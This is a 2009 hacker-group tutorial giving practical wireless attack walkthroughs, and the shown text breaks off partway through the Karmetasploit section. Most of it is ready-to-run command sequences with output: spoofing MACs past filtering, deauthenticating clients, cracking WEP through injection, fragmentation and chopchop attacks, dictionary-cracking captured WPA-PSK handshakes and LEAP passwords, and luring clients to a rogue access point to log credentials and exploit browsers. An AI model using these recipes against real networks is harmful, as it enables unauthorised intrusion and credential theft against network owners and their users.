|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Mac Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing informations on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10.
In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about
tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP.
Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about
using metasploit in wireless network through rogue AP.
#######################################
[0x01] - Security of Wireless Network
#######################################
Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capable of attacking
by using man in the middle method or others.
Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like this.
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase wireless security
and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and enterprise
respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC filtering. We will
talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker can do with
wireless network.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass Mac Filtering
++++++++++++++++++++++++++++++++
This is a basic security method by storing legitimate client MAC address in the access point. When there is authentication request
to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result is match,
the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change the MAC address by a few commands.
We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration testing of a company.
First, we use kismet to discover the access points around the company. This make us know the exact location of each access point. Then we use airodump-ng
by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from airodump-ng that
the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but the access point refuse
our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clients associating with access point.
We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything is fine. We can attach to access point.
Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against internal server. It is very dangerous.
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network
and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght.
The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client connect to network.
We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client by using aireplay-ng.
The command for doing that is like this:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
After sending du-authentication packet to the client, the client will do re-authentication and re-association.
Airodump-ng can detect this process and know SSID of this network.
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing informations on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication without
encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protocol like http,
telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the captured packets.
We are able to sniff others data by using airodump-ng.
###########################################
[0x03] - Get closer with cracking tool
###########################################
We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets
have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack,
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card, in preferred channel
- aireplay-ng: used for injection
o de-authentication: used to send deauthentication packet to associated client
o fake authentication: used to perform fake authentication process
o interactive packet replay: used to choose the preferred packet to perform replay attack
o arp replay: used to perform arp replay attack automatically
o Korek chopchop: used to generate key stream by using chopchop technique
o fragment: used to generate key stream by using fragment technique
- packetforge-ng: used for create packet
- aircrack-ng: used for recovering key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already
provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like:
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop workshop-02.cap
The output from these commands is file ending with "-dec.cap".
PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are encrypted with random WEP key
to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result will be wrong or there is no result
returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command return two files:
- workshop-01-filtered.cap: contain the filtered packets from specific bssid
- workshop-01-cloaked.cap: contain the cloaked packets from specific bssid
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW Attack (-z)
(aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you must dump all packet from airodump-ng
Dictionary Attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap)
Fudge Attack (-f)
Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it each time.
** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better"
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP key.
The first of all, we should prepare the device which supports monitor mode and can inject packet to the network.
After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware.
Ok, let clear about concept of cracking WEP.
The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the WEP key.
So, there are two situations from the above idea.
1. The network is high traffic.
2. The network is low traffic.
What's different between them?
Of course, the first case, we use only airodump to collect packet and crack the key but the second case,
we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method.
Then we talk about injecting method which is used only with low traffic network.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and
about 150,000 IV packets for 128-bits WEP key.
The command for collecting packets is
#airodump-ng –w workshop rausb0
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We will get file “workshop-01.cap†used for cracking the key later.
We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV packets.
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of target access point
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this method is that
we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV.
If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to access point
and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broadcast MAC address.
We can conclude about the requirements of chosen packet for injection as following.
- The MAC address is associated to access point. (we can do this by fake authentication)
- Send from client to access point. (the “To DS†flag is set to 1)
- The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)
The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay-ng which has an option to perform arp replay attack. The idea of this attack is to capture the arp request and then replay it to access point in order to generate new IV packets. But if that network has no arp request broadcast at that time. Now, we can divide the situation for injection technique into 2 scenarios.
- The network has ARP request.
- The network has no ARP request.
No matter which case we are faced with, the important we have to realize is that we have to perform injection with associated MAC address.
Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authentication.
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet.
#airmon-ng start wlan0 11
Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel.
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication by following command.
#aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–a xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
If we get successful result, our MAC address will associate with particular access point.
The successful result look like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropriate steps to deal with it.
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can use arp replay attack by following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–b xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
Aireplay-ng will detect arp request and use it to perform replay attack automatically.
The response will look like following when it find out arp request.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attack.
We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to access point
in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack†and “fragment attackâ€.
Both methods can perform by aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a packet
which has size up to 1500 bytes. The command for fragment attack is
#aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypted packet used to decrypt
to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack.
We are able to use chopchop attack with this command.
#aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target.
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we will answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
And then the system do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet.
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment.
#Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y replay_dec-0223-211410.xor –w arp
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get arp request packet in file named “arpâ€.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay to inject arp request packet to access point by following command.
#aireplay-ng -2 –r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We have to answer "y"
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –z capture1.cap (PTW Attack)
The successful cracking result is following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is Access Point MAC Address
$WIFI is WIFI Card MAC Address
- airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** These Method can use for Crack WEP with Clientless
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities.
So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture
four ways handshake and crack by using dictionary attack.
The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate associated client.
This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for de-authentication is:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack.
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
The successful result is following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies turned to use public key encryption with wireless network and they think that
it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate.
This attacking method takes an advantage of client incaution. Many clients accept certification
without considering whether it is genuine certificate or not. This make attacker impersonate himself
to be radius server and loggin credential information from victims.
We can use freeradius as fake radius server combining with wpe patch to enable loggin credential
information on freeradius server
additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
################################
[0x09] - Exploiting CISCO LEAP
################################
Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible authentication protocol (EAP)
types specified by 802.1X.
LEAP is easy to implement and contains compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also Vulnerable for Exploit...
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords, asleap can perform:
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
First step, Use asleap to produce the necessary database (.dat) and index files (.idx)
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Notice: The successful rate is up to dictionary size
Now ASLEAP 2.2, which includes the “-C†and “-R†options to specify the hex-delimited bytes for the challenge and the response (respectively). Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have a MS-CHAPv2 packet capture available.
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the framework.
Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, credential information etc
of the client and still also exploit the browser vulnerabilities on client machine.
This Method was test in Backtrack3 (Final)
1. Update Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Now It's work for Injection !!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download Bash script from http://www.darkoperator.com/kmsapng.tgz
The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
